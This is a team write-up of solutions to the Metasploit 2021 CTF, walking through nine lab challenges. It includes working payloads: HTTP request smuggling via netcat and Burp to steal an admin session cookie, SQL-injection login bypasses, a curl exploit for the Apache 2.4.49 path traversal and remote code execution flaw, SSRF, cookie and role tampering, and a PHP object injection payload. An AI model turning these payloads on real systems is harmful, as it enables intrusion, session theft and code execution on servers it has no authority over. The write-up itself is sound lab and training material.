MetaSploit 2021
2 of spades
Solved by: Taz34
Did a NIKTO scan on the target
nikto -h http://172.17.15.117:443/
and one of the lines in the result showed this :
+ /.env: .env file found. The .env file may contain credentials.
so i headed to this sub directory
inserted the file name in the URL
http://172.17.15.117:443/3e6f0e21-7faa-429f-8a1d-3f715a520da4.png
and we have the flag.
3 of hearts
Solved too late by : Starry-lord
Port 33337
I solved this one after the competition but still felt compelled to share the process.
This one gave me a hard time, firstly because I hadn’t seen HTTP request smuggling scenarios before.
Trying to connect to the target IP:33337 redirects to a domain name
threeofhearts.ctf.net
And displays an empty page with only the following content:
<script>console.log(zp2)</script>
Some snooping showed me the initial request was made to an Apache traffic server 7.1.1 and the second one to an Nginx server 1.15.5. After a few research I realized there wasn’t much resource on the subject, but here’s what I found :
- PortSwigger Web academy
- https://medium.com/@knownsec404team/protocol-layer-attack-http-request-smuggling-cc654535b6f
- https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
Sadly no time for going through academy through the ctf but will definitely look into it in a nearby future.
I used 2 ways to try and see what was going on :
Way n°1 - CLI
printf 'GET_/somthingthatdoesntexist_HTTP/1.1\r\n'\
'Host:threeofhearts.ctf.net\r\n'\
'X:_"%65534s"\r\n'\
'GET_http://threeofhearts.ctf.net/_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 172.17.15.117 33337
So here we manage to get double request by adding 65534 empty spaces between 2 get requests.
First one results in a 400 error and second request goes through and shows the content of the internal website.
┌──(kali㉿kali)-[~/.starlord]
└─$ printf 'GET_/somethingNotThere_HTTP/1.1\r\n'\
'Host:threeofhearts.ctf.net\r\n'\
'X:_"%65534s"\r\n'\
'GET_http://threeofhearts.ctf.net/out/save.txt_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 172.17.15.117 33337
HTTP/1.1 400 Invalid HTTP Request
Date: Sun, 05 Dec 2021 23:34:29 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220
<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request.
</B></FONT>
<HR>
</BODY>
HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Sun, 05 Dec 2021 23:34:29 GMT
Content-Type: text/plain
Content-Length: 151
Last-Modified: Sun, 05 Dec 2021 23:08:15 GMT
ETag: "61ad465f-97"
X-Requested: /out/save.txt
Accept-Ranges: bytes
Age: 0
Connection: keep-alive
Params:
Headers:
X-Access:
Cookie:
Params:
cache=0
Headers:
X-Access:
Cookie:
Params:
var1=star
var2=lord
Headers:
X-Access:
Cookie:
┌──(kali㉿kali)-[~/.starlord]
└─$
WAY n°2 - BurpSuite
It also worked with just a 0 in between GET requests and would be easier to input to burpsuite.
The website’s content would only show itself in a browser if the request was intercepted and its “Host” header manually set to threeofhearts.ctf.net
From there I found a small page with a PHP form for var1 and var2. By pressing submit, a GET request would be sent to /save.php and populate an entry in the above queried file (/out/save.txt).
There was a /private.php we were denied access to, where the flag was clearly hidden. This is the point where I had most trouble trouble realizing what was going on.
I knew we had to craft or find the right cookie to access the private.php but didn’t understand the fundamental of the HTTP request smuggling attack.
Turns out when you manage to split the request successfully, the second one will be sent from the server, which means admin headers in /out/save.txt in this case.
This was the burp request :
GET / HTTP/1.1
Host: threeofhearts.ctf
Transfer-Encoding: chunked
Content-Length:53
0
GET /save.php?var1=something&var2=something HTTP/1.1
Then making a request to /out/save.txt showed the following :
Headers:
X-Access: private
Cookie: PHPSESSID=theAdminPhpSessionId
Params:
var1=something
var2=something
Headers:
X-Access:
Cookie:
visiting /private.php with those header gave the un-guessable page link for the flag.
4 of diamonds
Solved by: Starry-Lord
Port 10010
Here we had a web app with a register and login page.
Registering gave access to the website and showed that the user details were stored in a javascript variable in the response.
<script>
var current_account = {
"id":2,"username":starlord,"role":"user","created_at":
"2021-12-03T6:36:42.821Z","updated_at":"2021-12-03T6:36:42.821Z"
};
</script>
By intercepting the register request, I noticed I was sending account[username]=starlord like parameters, and decided to add account[role]=admin to see if it would give me admin privilege.
By doing so I got a session with an additional admin button, which gave me the flag.
4 of hearts
Solved by: everyone
Port 80
Free Flag for the ones who managed to set their socks properly and access challenges.
5 of diamonds
Solved by: Starry-Lord, Thewhiteh4t, Bobbysox
Port 11111
This was an SQL Injection vulnerability. We had many problems for this one in terms of stability, in fact only one could attack it with sqlmap at the time.
We managed to get the password out from the database, which was a very long alpha-numeric string, bigger than max amount of chars accepted by the input field on the login page.
Passing the password with burp solved the problem and displayed a link to flag.png
Afterthought
We could bypass login through the username field with
username=X'or 1=1 --
password=notThePassword
but i missed that we could also simply bypass authentication with the password field:
username=admin
password='or 1=1 --
9 of diamonds
Solved By : thewhiteh4t
Port : 8080
In this challenge we were presented with a website about cookies, obvious hint. There were 3 sections :
- User Registration
- User Login
- Admin Login
First I registered a user account and checked the cookies, there were 4 cookies for our user :
- admin : false
- authenticated-user : true
- made-an-account : true
- visited-main-page : true
I just had to modify admin from false to true and send the request and we got the flag.
10 of clubs
Solved by: Starry-Lord
port 12380
This port was using Apache httpd 2.4.49 and I found a good research on the subject here:
https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013
I didn’t need to get a shell. ls and cat commands were enough to extract the png:
curl -vv 'http://172.17.15.117:12380/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo; cat ../secret/safe/flag.png|base64'
ace of hearts
Solved by: Starry-Lord
Port 20011
We had a image gallery here with 4 user galleries.
Sarah’s gallery John’s gallery Ripley’s gallery Ash’s gallery
John’s gallery was not accessible, set to private.
When querying any other gallery, we could see the URL changing like so:
http://172.17.15.117:20011/gallery?galleryUrl=/admin
I tried to call the admin gallery through local-host and got access to the admin panel, where I just had to untick a box for making John’s gallery public.
http://172.17.15.117:20011/gallery?galleryUrl=http://127.0.0.1:20011/admin
He had this flag inside:
Yay an Ace!!! — Starry-Lord
jack of hearts
Solved By : thewhiteh4t
Port : 20022
- User cookie is double base64 encoded, so we double decoded and ended up with the following :
O:4:"user":3:{
s:8:"username";s:4:"user";
s:5:"admin";b:0;
s:11:"profile_img";s:23:"/var/www/html/guest.png";
}
O -> Object
O:4 -> Object of length 4
:3: -> Object has 3 attributes
s -> String data type
s:8 -> String of length 8
b -> Boolean data type
b:0 -> False
- This was a PHP Object Injection challenge
- The goal of this challenge was not to become admin and if we try then the server sends hints or funny responses
- Directly accessing the flag did not work so we can simply use
../ - Final payload :
O:4:"user":3:{
s:8:"username";s:4:"user";
s:5:"admin";b:0;
s:11:"profile_img";s:40:"/var/www/html/../../../../../../flag.png";
}
